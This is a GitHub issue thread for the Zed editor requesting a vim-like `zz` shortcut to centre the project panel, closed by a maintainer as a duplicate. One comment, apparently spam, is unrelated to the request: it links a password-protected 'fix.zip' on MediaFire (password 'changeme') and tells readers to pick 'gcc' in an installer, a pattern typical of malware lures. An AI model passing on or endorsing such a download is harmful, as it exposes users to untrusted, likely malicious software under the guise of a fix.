### ISSUE TITLE
Be able to center the project panel with a shortcut, like `zz` from vim

### ISSUE THREAD

**Issue by lfelipessilva** [zed-industries/zed#16871] opened 2024-08-26 12:29 UTC
### Check for existing issues

- [X] Completed

### Describe the feature

Basically "scrolling" through the project panel with the keyboard using vim mode could improve in some ways 

If you for example is going down pressing "j" you will reach the last element on the list, if you keep going down it is going to render one file at once, wich means you will always be on the last element on the list.

In vim-tree for example you are able to press `zz` and the file you have hovered will be at center of the screen.

Can we add something like that to the project panel?

**Comment by TerminatedGA** [comment] 2024-08-26 12:33
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ConradIrwin** [comment] 2024-08-28 04:47
Duplicate of #10930

**Closed by ConradIrwin** 2024-08-28 04:47 UTC
Labels: enhancement, vim, project panel
